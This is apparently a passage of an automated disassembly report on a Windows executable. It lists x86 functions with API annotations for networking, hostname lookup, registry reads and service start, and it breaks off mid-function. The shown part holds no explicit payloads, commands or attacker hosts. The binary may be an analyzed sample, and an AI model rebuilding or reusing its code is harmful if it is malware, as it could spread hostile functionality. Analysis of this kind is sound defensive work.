Function 00412F3C, API count: 1, instr count: 109
APIs
    • ResetEvent.KERNEL32, ref: 00412EF6
    • WaitForSingleObject.KERNEL32, ref: 00412F06
  • InterlockedExchange.KERNEL32, ref: 00412FB7
Address Instruction Meta Information
00412F3C push ebp xrefs 00413586
00412F3D mov ebp, esp
00412F3F add esp, FFFFFFECh
00412F42 push ebx
00412F43 push esi
00412F44 push edi
00412F45 mov ebx, eax
00412F47 call 00406184h
00412F4C mov edx, dword ptr [0042B984h] 0042C030
00412F52 cmp eax, dword ptr [edx]
00412F54 je 00412F7Fh
00412F56 call 00406184h
00412F5B mov dword ptr [ebp-14h], eax
00412F5E mov byte ptr [ebp-10h], 00000000h
00412F62 lea eax, dword ptr [ebp-14h]
00412F65 push eax
00412F66 push 00000000h
00412F68 mov ecx, dword ptr [0042B8B8h] 0040F5AC
00412F6E mov dl, 01h
00412F70 mov eax, dword ptr [004100F0h] 0041013C
00412F75 call 0040A9C0h
00412F7A call 00403DB8h
00412F7F test ebx, ebx xrefs 00412F54
00412F81 jle 00412F8Ch
00412F83 mov eax, ebx
00412F85 call 00412EFCh
00412F8A jmp 00412F91h
00412F8C call 00412EF0h xrefs 00412F81
00412F91 xor eax, eax xrefs 00412F8A
00412F93 mov dword ptr [ebp-0Ch], eax
00412F96 push 0042C860h
00412F9B call 0040611Ch
00412FA0 xor eax, eax
00412FA2 push ebp
00412FA3 push 004130CAh
00412FA8 push dword ptr fs:[eax]
00412FAB mov dword ptr fs:[eax], esp
00412FAE mov eax, dword ptr [ebp-0Ch]
00412FB1 push eax
00412FB2 push 0042B3C4h
00412FB7 call 00406164h InterlockedExchange@KERNEL32.DLL (Hidden Import)
00412FBC mov dword ptr [ebp-0Ch], eax
00412FBF xor eax, eax
00412FC1 push ebp
00412FC2 push 004130ABh
00412FC7 push dword ptr fs:[eax]
00412FCA mov dword ptr fs:[eax], esp
00412FCD cmp dword ptr [ebp-0Ch], 00000000h
00412FD1 je 00412FDCh
00412FD3 mov eax, dword ptr [ebp-0Ch]
00412FD6 cmp dword ptr [eax+08h], 00000000h
00412FDA jnle 00412FE0h
00412FDC xor eax, eax xrefs 00412FD1
00412FDE jmp 00412FE2h
00412FE0 mov al, 01h xrefs 00412FDA
00412FE2 mov byte ptr [ebp-01h], al xrefs 00412FDE
00412FE5 cmp byte ptr [ebp-01h], 00000000h
00412FE9 je 00413095h
00412FEF jmp 00413088h
00412FF4 xor edx, edx xrefs 0041308F
00412FF6 mov eax, dword ptr [ebp-0Ch]
00412FF9 call 004106B0h
00412FFE mov dword ptr [ebp-08h], eax
00413001 xor edx, edx
00413003 mov eax, dword ptr [ebp-0Ch]
00413006 call 004105C0h
0041300B push 0042C860h
00413010 call 0040623Ch
00413015 xor eax, eax
00413017 push ebp
00413018 push 00413075h
0041301D push dword ptr fs:[eax]
00413020 mov dword ptr fs:[eax], esp
00413023 xor eax, eax
00413025 push ebp
00413026 push 00413046h
0041302B push dword ptr fs:[eax]
0041302E mov dword ptr fs:[eax], esp
00413031 mov eax, dword ptr [ebp-08h]
00413034 mov ebx, dword ptr [eax]
00413036 mov eax, dword ptr [ebx+0Ch]
00413039 call dword ptr [ebx+08h]
0041303C xor eax, eax
0041303E pop edx
00413040 pop ecx Count = 2
00413041 mov dword ptr fs:[eax], edx
00413044 jmp 0041305Dh
0041305D xor eax, eax xrefs 00413044
0041305F pop edx
00413061 pop ecx Count = 2
00413062 mov dword ptr fs:[eax], edx
00413065 push 0041307Ch
0041306A push 0042C860h xrefs 0041307A
0041306F call 0040611Ch
00413074 ret function end
00413088 mov eax, dword ptr [ebp-0Ch] xrefs 00412FEF
0041308B cmp dword ptr [eax+08h], 00000000h
0041308F jg 00412FF4h
00413095 xor eax, eax xrefs 00412FE9
00413097 pop edx
00413099 pop ecx Count = 2
0041309A mov dword ptr fs:[eax], edx
0041309D push 004130B2h
004130A2 mov eax, dword ptr [ebp-0Ch] xrefs 004130B0
004130A5 call 00403708h
004130AA ret function end
Function 00414FE8, API count: 3, instr count: 18
APIs
  • QueryPerformanceFrequency.KERNEL32, ref: 00414FF0
  • QueryPerformanceCounter.KERNEL32, ref: 00414FFA
  • GetTickCount.KERNEL32, ref: 00415018
Address Instruction Meta Information
00414FE8 add esp, FFFFFFF0h xrefs 00418634, 004186B6, 00418C06, 00418C68, 0041900B, 004190DD
00414FEB lea eax, dword ptr [esp+08h]
00414FEF push eax
00414FF0 call 00406254h QueryPerformanceFrequency@KERNEL32.DLL (Hidden Import)
00414FF5 test eax, eax
00414FF7 je 00415018h
00414FF9 push esp
00414FFA call 0040624Ch QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00414FFF fild qword ptr [esp]
00415002 fild qword ptr [esp+08h]
00415006 fdivp st(1), st(0)
00415008 fmul dword ptr [00415024h]
0041500E call 00402A44h
00415013 and eax, FFFFFFFFh
00415016 jmp 0041501Dh
00415018 call 004061F4h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00414FF7
0041501D add esp, 10h xrefs 00415016
00415020 ret function end
Function 00413B4C, API count: 1, instr count: 19
APIs
  • recvfrom.WS2_32, ref: 00413B67
Address Instruction Meta Information
00413B4C push ebp xrefs 00419D54
00413B4D mov ebp, esp
00413B4F push ecx
00413B50 push ebx
00413B51 mov dword ptr [ebp-04h], 0000001Ch
00413B58 lea ebx, dword ptr [ebp-04h]
00413B5B push ebx
00413B5C mov ebx, dword ptr [ebp+08h]
00413B5F push ebx
00413B60 mov ebx, dword ptr [ebp+0Ch]
00413B63 push ebx
00413B64 push ecx
00413B65 push edx
00413B66 push eax
00413B67 call dword ptr [0042B408h] recvfrom@WS2_32.DLL (Hidden Import)
00413B6D pop ebx
00413B6E pop ecx
00413B6F pop ebp
00413B70 retn 0008h function end
Function 00413D24, API count: 6, instr count: 163
APIs
    • getaddrinfo.WS2_32, ref: 00413BEF
    • getaddrinfo.WS2_32, ref: 00413C32
    • getaddrinfo.WS2_32, ref: 00413C6B
    • getaddrinfo.WS2_32, ref: 00413C8E
    • FreeAddrInfoW.WS2_32, ref: 00413CCD
  • getprotobynumber.WS2_32, ref: 00413D9C
  • getservbyname.WS2_32, ref: 00413DB6
  • htons.WS2_32, ref: 00413DCB
  • inet_addr.WS2_32, ref: 00413E02
  • gethostbyname.WS2_32, ref: 00413E11
  • WSAGetLastError.WS2_32, ref: 00413E19
Address Instruction Meta Information
00413D24 push ebp xrefs 00418105
00413D25 mov ebp, esp
00413D27 add esp, FFFFFF78h
00413D2D push ebx
00413D2E push esi
00413D2F push edi
00413D30 mov dword ptr [ebp-08h], ecx
00413D33 mov dword ptr [ebp-04h], edx
00413D36 mov ebx, eax
00413D38 mov edi, dword ptr [ebp+10h]
00413D3B mov esi, dword ptr [ebp+14h]
00413D3E mov eax, dword ptr [ebp-04h]
00413D41 call 00404868h
00413D46 mov eax, dword ptr [ebp-08h]
00413D49 call 00404868h
00413D4E xor eax, eax
00413D50 push ebp
00413D51 push 00413F2Bh
00413D56 push dword ptr fs:[eax]
00413D59 mov dword ptr fs:[eax], esp
00413D5C xor eax, eax
00413D5E mov dword ptr [ebp-0Ch], eax
00413D61 mov eax, ebx
00413D63 xor ecx, ecx
00413D65 mov edx, 0000001Ch
00413D6A call 00403030h
00413D6F mov eax, esi
00413D71 call 00413B74h
00413D76 test al, al
00413D78 jne 00413E4Fh
00413D7E mov eax, dword ptr [0042C8A4h] 00960A4C
00413D83 call 00413914h
00413D88 xor edx, edx
00413D8A push ebp
00413D8B push 00413E48h
00413D90 push dword ptr fs:[edx]
00413D93 mov dword ptr fs:[edx], esp
00413D96 mov word ptr [ebx], 0002h
00413D9B push edi
00413D9C call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00413DA2 mov esi, eax
00413DA4 xor eax, eax
00413DA6 test esi, esi
00413DA8 je 00413DBCh
00413DAA mov eax, dword ptr [esi]
00413DAC push eax
00413DAD mov eax, dword ptr [ebp-08h]
00413DB0 call 00404878h
00413DB5 push eax
00413DB6 call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00413DBC test eax, eax xrefs 00413DA8
00413DBE jne 00413DD7h
00413DC0 xor edx, edx
00413DC2 mov eax, dword ptr [ebp-08h]
00413DC5 call 00407608h
00413DCA push eax
00413DCB call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00413DD1 mov word ptr [ebx+02h], ax
00413DD5 jmp 00413DDFh
00413DD7 mov ax, word ptr [eax+08h] xrefs 00413DBE
00413DDB mov word ptr [ebx+02h], ax
00413DDF mov eax, dword ptr [ebp-04h] xrefs 00413DD5
00413DE2 mov edx, 00413F48h
00413DE7 call 004047C4h
00413DEC jne 00413DF7h
00413DEE mov dword ptr [ebx+04h], FFFFFFFFh
00413DF5 jmp 00413E30h
00413DF7 mov eax, dword ptr [ebp-04h] xrefs 00413DEC
00413DFA call 00404878h
00413DFF mov edi, eax
00413E01 push edi
00413E02 call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00413E08 mov esi, eax
00413E0A mov dword ptr [ebx+04h], esi
00413E0D inc esi
00413E0E jne 00413E30h
00413E10 push edi
00413E11 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
00413E17 mov esi, eax
00413E19 call dword ptr [0042B3D0h] WSAGetLastError@WS2_32.DLL (Hidden Import)
00413E1F mov dword ptr [ebp-0Ch], eax
00413E22 test esi, esi
00413E24 je 00413E30h
00413E26 mov eax, dword ptr [esi+0Ch]
00413E2B mov eax, dword ptr [eax] Count = 2
00413E2D mov dword ptr [ebx+04h], eax
00413E30 xor eax, eax xrefs 00413E0E, 00413E24, 00413DF5
00413E32 pop edx
00413E34 pop ecx Count = 2
00413E35 mov dword ptr fs:[eax], edx
00413E38 push 00413F10h
00413E3D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00413E4D
00413E42 call 0041391Ch
00413E47 ret function end
00413E4F lea eax, dword ptr [ebp-30h] xrefs 00413D78
00413E52 xor ecx, ecx
00413E54 mov edx, 00000020h
00413E59 call 00403030h
00413E5E lea eax, dword ptr [ebp-50h]
00413E61 xor ecx, ecx
00413E63 mov edx, 00000020h
00413E68 call 00403030h
00413E6D mov byte ptr [ebp-0Dh], 00000000h
00413E71 test esi, esi
00413E73 jne 00413EA3h
00413E75 cmp byte ptr [ebp+08h], 00000000h
00413E79 je 00413E8Fh
00413E7B mov dword ptr [ebp-2Ch], 00000002h
00413E82 mov dword ptr [ebp-4Ch], 00000017h
00413E89 mov byte ptr [ebp-0Dh], 00000001h
00413E8D jmp 00413EA6h
00413E8F mov dword ptr [ebp-4Ch], 00000002h xrefs 00413E79
00413E96 mov dword ptr [ebp-2Ch], 00000017h
00413E9D mov byte ptr [ebp-0Dh], 00000001h
00413EA1 jmp 00413EA6h
00413EA3 mov dword ptr [ebp-2Ch], esi xrefs 00413E73
00413EA6 mov eax, dword ptr [ebp+0Ch] xrefs 00413EA1, 00413E8D
00413EA9 mov dword ptr [ebp-28h], eax
00413EAC mov eax, edi
00413EAE mov dword ptr [ebp-24h], eax
00413EB1 mov edx, dword ptr [ebp-28h]
00413EB4 mov dword ptr [ebp-48h], edx
00413EB7 mov dword ptr [ebp-44h], eax
00413EBA lea eax, dword ptr [ebp-6Ch]
00413EBD push eax
00413EBE lea ecx, dword ptr [ebp-30h]
00413EC1 mov edx, dword ptr [ebp-08h]
00413EC4 mov eax, dword ptr [ebp-04h]
00413EC7 call 00413B90h
00413ECC mov dword ptr [ebp-0Ch], eax
00413ECF mov edi, ebx
00413ED1 lea esi, dword ptr [ebp-6Ch]
00413ED4 mov ecx, 00000007h
00413ED9 rep movsd
00413EDB test eax, eax
00413EDD je 00413F10h
00413EDF cmp byte ptr [ebp-0Dh], 00000000h
00413EE3 je 00413F10h
00413EE5 lea eax, dword ptr [ebp-00000088h]
00413EEB push eax
00413EEC lea ecx, dword ptr [ebp-50h]
00413EEF mov edx, dword ptr [ebp-08h]
00413EF2 mov eax, dword ptr [ebp-04h]
00413EF5 call 00413B90h
00413EFA mov dword ptr [ebp-0Ch], eax
00413EFD test eax, eax
00413EFF jne 00413F10h
00413F01 mov edi, ebx
00413F03 lea esi, dword ptr [ebp-00000088h]
00413F09 mov ecx, 00000007h
00413F0E rep movsd
00413F10 xor eax, eax xrefs 00413EDD, 00413EE3, 00413EFF
00413F12 pop edx
00413F14 pop ecx Count = 2
00413F15 mov dword ptr fs:[eax], edx
00413F18 push 00413F32h
00413F1D lea eax, dword ptr [ebp-08h] xrefs 00413F30
00413F20 mov edx, 00000002h
00413F25 call 00404400h
00413F2A ret function end
Function 004035A8, API count: 3, instr count: 49
APIs
  • RegOpenKeyExA.ADVAPI32, ref: 004035CA
  • RegQueryValueExA.ADVAPI32, ref: 004035FD
  • RegCloseKey.ADVAPI32, ref: 00403613
Strings
  • FPUMaskValue, va: 0040365C
Address Instruction Meta Information
004035A8 push ebp xrefs 00405EE2
004035A9 mov ebp, esp
004035AB add esp, FFFFFFF4h
004035AE movzx eax, word ptr [0042B024h]
004035B5 mov dword ptr [ebp-08h], eax
004035B8 lea eax, dword ptr [ebp-04h]
004035BB push eax
004035BC push 00000001h
004035BE push 00000000h
004035C0 push 00403640h
004035C5 push 80000002h
004035CA call 004012B0h RegOpenKeyExA@ADVAPI32.DLL (Hidden Import)
004035CF test eax, eax
004035D1 jne 00403620h
004035D3 xor eax, eax
004035D5 push ebp
004035D6 push 00403619h
004035DB push dword ptr fs:[eax]
004035DE mov dword ptr fs:[eax], esp
004035E1 mov dword ptr [ebp-0Ch], 00000004h
004035E8 lea eax, dword ptr [ebp-0Ch]
004035EB push eax
004035EC lea eax, dword ptr [ebp-08h]
004035EF push eax
004035F2 push 00000000h Count = 2
004035F4 push 0040365Ch ASCII "FPUMaskValue"
004035F9 mov eax, dword ptr [ebp-04h]
004035FC push eax
004035FD call 004012B8h RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
00403602 xor eax, eax
00403604 pop edx
00403606 pop ecx Count = 2
00403607 mov dword ptr fs:[eax], edx
0040360A push 00403620h
0040360F mov eax, dword ptr [ebp-04h] xrefs 0040361E
00403612 push eax
00403613 call 004012A8h RegCloseKey@ADVAPI32.DLL (Import)
00403618 ret function end
00403620 mov ax, word ptr [0042B024h] 1332 xrefs 004035D1
00403626 and ax, 0000FFC0h
0040362A mov dx, word ptr [ebp-08h]
0040362E and dx, 003Fh
00403632 or ax, dx
00403635 mov word ptr [0042B024h], ax
0040363B mov esp, ebp
0040363D pop ebp
0040363E ret function end
Function 00412F24, API count: 1, instr count: 3
APIs
  • InterlockedIncrement.KERNEL32, ref: 00412F29
Address Instruction Meta Information
00412F24 push 0042C878h xrefs 004131BB
00412F29 call 0040616Ch InterlockedIncrement@KERNEL32.DLL (Hidden Import)
00412F2E ret function end
Function 00414038, API count: 2, instr count: 22
APIs
  • htons.WS2_32, ref: 00414056
  • htons.WS2_32, ref: 00414067
Address Instruction Meta Information
00414038 push esi xrefs 004181CB
00414039 push edi
0041403A add esp, FFFFFFE4h
0041403D mov esi, eax
0041403F lea edi, dword ptr [esp]
00414042 mov ecx, 00000007h
00414047 rep movsd
00414049 cmp word ptr [esp], 0017h
0041404E jne 00414061h
00414050 mov ax, word ptr [esp+02h]
00414055 push eax
00414056 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041405C movzx eax, ax
0041405F jmp 00414070h
00414061 mov ax, word ptr [esp+02h] xrefs 0041404E
00414066 push eax
00414067 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041406D movzx eax, ax
00414070 add esp, 1Ch xrefs 0041405F
00414073 pop edi
00414074 pop esi
00414075 ret function end
Function 00405FEC, API count: 1, instr count: 21
APIs
    • TlsSetValue.KERNEL32, ref: 00405FE5
  • TlsGetValue.KERNEL32, ref: 00406022
Address Instruction Meta Information
00405FEC mov cl, byte ptr [0042C65Ch] 00 xrefs 00402813, 004027B8, 00413679, 004027F3, 0040275A, 00402768, 00402776, 00402871, 0040287C, 00403BA8, 00403DEB, 00403BD5, 00403D31, 00403D5D, 00403E34
00405FF2 mov eax, dword ptr [0042B0C4h] 00000000
00405FF7 test cl, cl
00405FF9 jne 00406021h
00405FFB mov edx, dword ptr fs:[0000002Ch]
00406002 mov eax, dword ptr [edx+eax*4]
00406005 ret function end
00406006 call 00405FA8h xrefs 00406029
0040600B mov eax, dword ptr [0042B0C4h] 00000000
00406010 push eax
00406011 call 00405F84h
00406016 test eax, eax
00406018 je 0040601Bh
0040601A ret function end
0040601B mov eax, dword ptr [0042C668h] 00000000 xrefs 00406018
00406020 ret function end
00406021 push eax xrefs 00405FF9
00406022 call 00405F84h TlsGetValue@KERNEL32.DLL (Hidden Import)
00406027 test eax, eax
00406029 je 00406006h
0040602B ret function end
Function 004078D0, API count: 1, instr count: 27
APIs
  • SetFilePointer.KERNEL32, ref: 004078F2
Address Instruction Meta Information
004078D0 push ebp xrefs 004121EA
004078D1 mov ebp, esp
004078D3 add esp, FFFFFFF8h
004078D6 push ebx
004078D7 push esi
004078D8 mov esi, edx
004078DA mov ebx, eax
004078DC mov eax, dword ptr [ebp+08h]
004078DF mov dword ptr [ebp-08h], eax
004078E2 mov eax, dword ptr [ebp+0Ch]
004078E5 mov dword ptr [ebp-04h], eax
004078E8 push esi
004078E9 lea eax, dword ptr [ebp-04h]
004078EC push eax
004078ED mov eax, dword ptr [ebp-08h]
004078F0 push eax
004078F1 push ebx
004078F2 call 00406284h SetFilePointer@KERNEL32.DLL (Hidden Import)
004078F7 mov dword ptr [ebp-08h], eax
004078FA mov eax, dword ptr [ebp-08h]
004078FD mov edx, dword ptr [ebp-04h]
00407900 pop esi
00407901 pop ebx
00407903 pop ecx Count = 2
00407904 pop ebp
00407905 retn 0008h function end
Function 00412F18, API count: 1, instr count: 4
APIs
  • SetEvent.KERNEL32, ref: 00412F1E
Address Instruction Meta Information
00412F18 mov eax, dword ptr [0042C848h] 00000048 xrefs 00413159, 0041340E
00412F1D push eax
00412F1E call 0040627Ch SetEvent@KERNEL32.DLL (Hidden Import)
00412F23 ret function end
Function 0040BE34, API count: 0, instr count: 26
Address Instruction Meta Information
0040BE34 push ebx
0040BE35 push esi
0040BE36 call 004039B8h
0040BE3B mov ebx, edx
0040BE3D mov esi, eax
0040BE3F mov eax, esi
0040BE41 call 0040BEC0h
0040BE46 mov edx, ebx
0040BE48 and dl, FFFFFFFCh
0040BE4B mov eax, esi
0040BE4D call 004036F8h
0040BE52 mov eax, dword ptr [esi+10h]
0040BE55 push eax
0040BE56 call 004060ECh
0040BE5B mov eax, dword ptr [esi+14h]
0040BE5E push eax
0040BE5F call 004060ECh
0040BE64 mov eax, dword ptr [esi+20h]
0040BE67 call 00403708h
0040BE6C test bl, bl
0040BE6E jle 0040BE77h
0040BE70 mov eax, esi
0040BE72 call 004039A0h
0040BE77 pop esi xrefs 0040BE6E
0040BE78 pop ebx
0040BE79 ret function end
Function 00413A60, API count: 1, instr count: 37
APIs
  • gethostname.WS2_32, ref: 00413A9D
Address Instruction Meta Information
00413A60 push ebp xrefs 00419785
00413A61 mov ebp, esp
00413A63 push 00000000h
00413A65 push ebx
00413A66 mov ebx, eax
00413A68 xor eax, eax
00413A6A push ebp
00413A6B push 00413ACAh
00413A70 push dword ptr fs:[eax]
00413A73 mov dword ptr fs:[eax], esp
00413A76 mov eax, ebx
00413A78 call 004043DCh
00413A7D lea eax, dword ptr [ebp-04h]
00413A80 mov edx, 000000FFh
00413A85 call 004049A8h
00413A8A mov eax, dword ptr [ebp-04h]
00413A8D call 00404678h
00413A92 dec eax
00413A93 push eax
00413A94 mov eax, dword ptr [ebp-04h]
00413A97 call 00404878h
00413A9C push eax
00413A9D call dword ptr [0042B3ECh] gethostname@WS2_32.DLL (Hidden Import)
00413AA3 mov eax, dword ptr [ebp-04h]
00413AA6 call 00404878h
00413AAB mov edx, eax
00413AAD mov eax, ebx
00413AAF call 004045D4h
00413AB4 xor eax, eax
00413AB6 pop edx
00413AB8 pop ecx Count = 2
00413AB9 mov dword ptr fs:[eax], edx
00413ABC push 00413AD1h
00413AC1 lea eax, dword ptr [ebp-04h] xrefs 00413ACF
00413AC4 call 004043DCh
00413AC9 ret function end
Function 00405990, API count: 1, instr count: 8
APIs
  • InterlockedIncrement.KERNEL32, ref: 0040599A
Address Instruction Meta Information
00405990 push ebp
00405991 mov ebp, esp
00405993 mov eax, dword ptr [ebp+08h]
00405996 add eax, 04h
00405999 push eax
0040599A call 004012E8h InterlockedIncrement@KERNEL32.DLL (Hidden Import)
0040599F pop ebp
004059A0 retn 0004h function end
Function 0040BC0C, API count: 2, instr count: 16
APIs
  • GetModuleHandleA.KERNEL32, ref: 0040BC12
  • GetProcAddress.KERNEL32, ref: 0040BC23
Strings
  • kernel32.dll, va: 0040BC44
  • GetDiskFreeSpaceExA, va: 0040BC54
Address Instruction Meta Information
0040BC0C push ebx xrefs 0040C530
0040BC0D push 0040BC44h ASCII "kernel32.dll"
0040BC12 call 004061CCh GetModuleHandleA@KERNEL32.DLL (Hidden Import)
0040BC17 mov ebx, eax
0040BC19 test ebx, ebx
0040BC1B je 0040BC2Dh
0040BC1D push 0040BC54h ASCII "GetDiskFreeSpaceExA"
0040BC22 push ebx
0040BC23 call 004061D4h GetProcAddress@KERNEL32.DLL (Import)
0040BC28 mov dword ptr [0042B154h], eax
0040BC2D cmp dword ptr [0042B154h], 00000000h xrefs 0040BC1B
0040BC34 jne 0040BC40h
0040BC36 mov eax, 00407A4Ch
0040BC3B mov dword ptr [0042B154h], eax
0040BC40 pop ebx xrefs 0040BC34
0040BC41 ret function end
Function 00429B14, API count: 3, instr count: 60
APIs
  • OpenServiceA.ADVAPI32, ref: 00429B39
  • StartServiceA.ADVAPI32, ref: 00429B4D
  • QueryServiceStatus.ADVAPI32, ref: 00429B5C
Address Instruction Meta Information
00429B14 push ebx xrefs 00429EDD
00429B15 push esi
00429B16 push edi
00429B17 add esp, FFFFFFE0h
00429B1A mov esi, eax
00429B1C mov dword ptr [esp+08h], 00000001h
00429B24 push 00000001h
00429B28 push 00000000h Count = 2
00429B2A call 00421BC4h
00429B2F mov ebx, eax
00429B31 test ebx, ebx
00429B33 jle 00429B9Dh
00429B35 push 00000014h
00429B37 push esi
00429B38 push ebx
00429B39 call 00421B6Ch OpenServiceA@ADVAPI32.DLL (Hidden Import)
00429B3E mov esi, eax
00429B40 test esi, esi
00429B42 jle 00429B97h
00429B44 xor eax, eax
00429B46 mov dword ptr [esp], eax
00429B49 push esp
00429B4A push 00000000h
00429B4C push esi
00429B4D call 00421B74h StartServiceA@ADVAPI32.DLL (Hidden Import)
00429B52 test al, al
00429B54 je 00429B91h
00429B56 lea eax, dword ptr [esp+04h]
00429B5A push eax
00429B5B push esi
00429B5C call 00421BACh QueryServiceStatus@ADVAPI32.DLL (Hidden Import)
00429B61 test al, al
00429B63 je 00429B91h
00429B65 jmp 00429B8Ah
00429B67 mov edi, dword ptr [esp+18h] xrefs 00429B8F
00429B6B mov eax, dword ptr [esp+1Ch]
00429B6F push eax
00429B70 call 00421B84h
00429B75 lea eax, dword ptr [esp+04h]
00429B79 push eax
00429B7A push esi
00429B7B call 00421BACh
00429B80 test al, al
00429B82 je 00429B91h
00429B84 cmp edi, dword ptr [esp+18h]
00429B88 jnle 00429B91h
00429B8A cmp dword ptr [esp+08h], 04h xrefs 00429B65
00429B8F jne 00429B67h
00429B91 push esi xrefs 00429B54, 00429B63, 00429B82, 00429B88
00429B92 call 00421B64h
00429B97 push ebx xrefs 00429B42
00429B98 call 00421B64h
00429B9D cmp dword ptr [esp+08h], 04h xrefs 00429B33
00429BA2 sete al
00429BA5 add esp, 20h
00429BA8 pop edi
00429BA9 pop esi
00429BAA pop ebx
00429BAB ret function end
Function 004020F4, API count: 0, instr count: 124
Address Instruction Meta Information
004020F4 push ebp xrefs 00402660
004020F5 mov ebp, esp
004020F7 add esp, FFFFFFF8h
004020FA push ebx
004020FB push esi
004020FC push edi
004020FD mov ebx, eax
004020FF cmp byte ptr [0042C5BCh], 00000000h
00402106 jne 00402111h
00402108 call 00401A08h
0040210D test al, al
0040210F je 00402119h
00402111 cmp ebx, 7FFFFFF8h xrefs 00402106
00402117 jle 00402123h
00402119 xor eax, eax xrefs 0040210F
0040211B mov dword ptr [ebp-04h], eax
0040211E jmp 00402277h
00402123 xor ecx, ecx xrefs 00402117
00402125 push ebp
00402126 push 00402270h
0040212B push dword ptr fs:[ecx]
0040212E mov dword ptr fs:[ecx], esp
00402131 cmp byte ptr [0042C045h], 00000000h
00402138 je 00402144h
0040213A push 0042C5C4h
0040213F call 00401364h
00402144 add ebx, 07h xrefs 00402138
00402147 and ebx, FFFFFFFCh
0040214A cmp ebx, 0Ch
0040214D jnl 00402154h
0040214F mov ebx, 0000000Ch
00402154 cmp ebx, 00001000h xrefs 0040214D
0040215A jg 004021F3h
00402160 mov eax, ebx
00402162 test eax, eax
00402164 jns 00402169h
00402166 add eax, 03h
00402169 sar eax, 02h xrefs 00402164
0040216C mov edx, dword ptr [0042C61Ch] 00000000
00402172 mov edx, dword ptr [edx+eax*4-0Ch]
00402176 test edx, edx
00402178 je 004021F3h
0040217A mov esi, edx
0040217C mov eax, esi
0040217E add eax, ebx
00402180 and dword ptr [eax], FFFFFFFEh
00402183 mov eax, dword ptr [edx+04h]
00402186 cmp edx, eax
00402188 jne 004021A4h
0040218A mov eax, ebx
0040218C test eax, eax
0040218E jns 00402193h
00402190 add eax, 03h
00402193 sar eax, 02h xrefs 0040218E
00402196 mov ecx, dword ptr [0042C61Ch] 00000000
0040219C xor edi, edi
0040219E mov dword ptr [ecx+eax*4-0Ch], edi
004021A2 jmp 004021CAh
004021A4 mov ecx, ebx xrefs 00402188
004021A6 test ecx, ecx
004021A8 jns 004021ADh
004021AA add ecx, 03h
004021AD sar ecx, 02h xrefs 004021A8
004021B0 mov edi, dword ptr [0042C61Ch] 00000000
004021B6 mov dword ptr [edi+ecx*4-0Ch], eax
004021BA mov ecx, dword ptr [edx]
004021BC mov dword ptr [ebp-08h], ecx
004021BF mov ecx, dword ptr [ebp-08h]
004021C2 mov dword ptr [ecx+04h], eax
004021C5 mov ecx, dword ptr [ebp-08h]
004021C8 mov dword ptr [eax], ecx
004021CA mov eax, esi xrefs 004021A2
004021CC mov edx, dword ptr [edx+08h]
004021CF or edx, 02h
004021D2 mov dword ptr [eax], edx
004021D4 add eax, 04h
004021D7 mov dword ptr [ebp-04h], eax
004021DA inc dword ptr [0042C5ACh]
004021E0 sub ebx, 04h
004021E3 add dword ptr [0042C5B0h], ebx
004021E9 call 00403E64h
004021EE jmp 00402277h
004021F3 cmp ebx, dword ptr [0042C614h] 000020B4 xrefs 0040215A, 00402178
004021F9 jnle 00402245h
004021FB sub dword ptr [0042C614h], ebx
00402201 cmp dword ptr [0042C614h], 0Ch
00402208 jnl 00402217h
0040220A add ebx, dword ptr [0042C614h]
00402210 xor eax, eax
00402212 mov dword ptr [0042C614h], eax
00402217 mov eax, dword ptr [0042C618h] 00961F48 xrefs 00402208
0040221C add dword ptr [0042C618h], ebx
00402222 mov edx, ebx
00402224 or edx, 02h
00402227 mov dword ptr [eax], edx
00402229 add eax, 04h
0040222C mov dword ptr [ebp-04h], eax
0040222F inc dword ptr [0042C5ACh]
00402235 sub ebx, 04h
00402238 add dword ptr [0042C5B0h], ebx
0040223E call 00403E64h
00402243 jmp 00402277h
00402245 mov eax, ebx xrefs 004021F9
00402247 call 00402000h
0040224C mov dword ptr [ebp-04h], eax
0040224F xor eax, eax
00402251 pop edx
00402253 pop ecx Count = 2
00402254 mov dword ptr fs:[eax], edx
00402257 push 00402277h
0040225C cmp byte ptr [0042C045h], 00000000h xrefs 00402275
00402263 je 0040226Fh
00402265 push 0042C5C4h
0040226A call 0040136Ch
0040226F ret xrefs 00402263 function end
00402277 mov eax, dword ptr [ebp-04h] xrefs 00402243, 004021EE, 0040211E
0040227A pop edi
0040227B pop esi
0040227C pop ebx
0040227E pop ecx Count = 2
0040227F pop ebp
00402280 ret function end
Function 0040DBB4, API count: 1, instr count: 139
APIs
  • 77124CFD.OLEAUT32, ref: 0040DD6D
Address Instruction Meta Information
0040DBB4 push ebp xrefs 0040DDFD
0040DBB5 mov ebp, esp
0040DBB7 add esp, FFFFFCE0h
0040DBBD push ebx
0040DBBE push esi
0040DBBF push edi
0040DBC0 mov dword ptr [ebp-00000308h], ecx
0040DBC6 mov ebx, edx
0040DBC8 mov dword ptr [ebp-00000304h], eax
0040DBCE test byte ptr [ebx+01h], 00000020h
0040DBD2 jne 0040DBDEh
0040DBD4 mov eax, 80070057h
0040DBD9 call 0040D7F4h
0040DBDE mov ax, word ptr [ebx] xrefs 0040DBD2
0040DBE1 mov edx, eax
0040DBE3 and dx, 0FFFh
0040DBE8 cmp dx, 000Ch
0040DBEC jne 0040DD65h
0040DBF2 test ah, 00000040h
0040DBF5 je 0040DC04h
0040DBF7 mov eax, dword ptr [ebx+08h]
0040DBFA mov eax, dword ptr [eax]
0040DBFC mov dword ptr [ebp-00000314h], eax
0040DC02 jmp 0040DC0Dh
0040DC04 mov eax, dword ptr [ebx+08h] xrefs 0040DBF5
0040DC07 mov dword ptr [ebp-00000314h], eax
0040DC0D mov eax, dword ptr [ebp-00000314h] xrefs 0040DC02
0040DC13 movzx eax, word ptr [eax]
0040DC16 mov dword ptr [ebp-00000310h], eax
0040DC1C mov ebx, dword ptr [ebp-00000310h]
0040DC22 dec ebx
0040DC23 test ebx, ebx
0040DC25 jl 0040DC92h
0040DC27 inc ebx
0040DC28 xor edi, edi
0040DC2A lea esi, dword ptr [ebp-00000300h]
